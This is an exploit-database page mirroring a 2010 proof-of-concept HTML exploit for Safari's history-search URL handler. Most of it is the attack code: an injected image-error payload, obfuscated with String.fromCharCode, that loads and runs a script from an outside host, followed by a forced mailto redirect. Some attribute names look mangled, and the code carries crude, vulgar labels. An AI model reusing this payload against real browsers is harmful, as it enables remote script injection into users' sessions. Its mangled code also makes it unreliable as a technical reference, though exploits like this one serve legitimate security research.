Advertisement






Apple Safari history search <= Code Execution Exploit PoC

CVE Category Price Severity
Author Risk Exploitation Type Date
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2010030125

Below is a copy:

=========================================================
Apple Safari history search <= Code Execution Exploit PoC
=========================================================

<!--
Copyright (C) 2009-2010 firelinking by eidelweiss
Greets: AL-MARHUM , [D]eal [C]yber , My Mother (i miss u)
Credit: JosS (hackown) , r0073r & 0x1D (inj3ct0r) , YOGYACARDERLINK
This P0C made for Educational Purpose only
Author Will Be not responsible For Any Damage.
-->

<html>
<script>
function Dick() {
  window.open('safari:historysearch?q=%2A"><img src=\'Dick\' Dickonerror='evalalert(String.fromCharCode(113,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,83,67,82,73,80,84,34,41,59,113,46,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,114,97,102,102,111,110,46,110,101,116,47,114,101,115,101,97,114,99,104,47,111,112,101,114,97,47,104,105,115,116,111,114,121,47,111,46,106,115,34,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,113,41,59))\'>&p=1&s=1');
  window.setTimeout("location.href='mailto:'",6666);
}
</script>
<body scrolling="no">
<a href="#" onclick="Dick()">Suck Please...</a>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />

<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />

<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />

<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />

<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />

<br />
<br />
<br />
<br />
<br />
<br />
<br />
&lt;<img src=\'Dick\' Dickonerror='evalalert(String.fromCharCode(113,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,83,67,82,73,80,84,34,41,59,113,46,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,114,97,102,102,111,110,46,110,101,116,47,114,101,115,101,97,114,99,104,47,111,112,101,114,97,47,104,105,115,116,111,114,121,47,111,46,106,115,34,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,113,41,59))'&gt;
</body>
</html>


Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.